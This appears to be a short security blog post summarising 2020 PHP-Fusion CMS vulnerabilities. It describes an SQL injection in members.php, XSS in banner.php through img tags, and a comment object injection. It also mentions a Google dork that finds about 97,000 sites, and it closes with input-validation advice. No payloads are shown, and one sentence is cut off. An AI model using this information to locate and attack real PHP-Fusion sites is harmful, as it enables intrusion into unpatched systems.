PHP-fusion security vulnerabilities 2020

php-fusion on

In today’s exploit of the day we cover recent security vulnerabilities released for PHP-fusion.

PHP-fusion is an opensource Wordpress and Joomla content management system alternative dating back as far as 2003.
PHP-fusion has so far been able to score 5 major vulnerabilities with the CVE’s of:

PHP-fusion’s Q&A and shoutbox areas are both vulnerable to Cross-site scripting vulnerabilities.

  • CVE-2020-12461
    SecGus was able to find out that the members.php
    search function does not properly validate the input(being the
    order the data is displayed in, resulting in manipulating the order by sql query)
    before it is passed into the mysql backend database.
    This is allowing third parties to execute malicious sql commands resulting in a SQL injection.

  • CVE-2020-12438
    PHP-fusion has implemented a protection against cross-site scripting attacks
    in the banner.php part of its codebase by removing html script tags, However
    html allows img tags to execute javascript.
    This was quickly found and reported in issue #2307.

Another interesting vulnerability that has not made it to a CVE yet
is a php object injection released 2020-05-26.
By injecting sql commands and submitting them as comments
using the “Feedback/Comments.ajax.php” function a
malicious third party is allowed to execute and trigger

Link to writeup:

Proof of concept exploit:

Find hosts

We did a quick google dork for php-fusion and got 97 000 results

Google dork for php-fusion

Find vulnerabilities in your codebase

A chunk of these vulnerabilities was made possible due to a lack of input validation.
If you audit source code we recommend that you check all inputs that are being passed
in to the backend database, if you are passing
raw user input into a sql query then your application is
most likely vulnerable to sql injection attacks.

A great cure for this is to use MySQL’s escape function to escape user input as well as writing
a proper input validation function.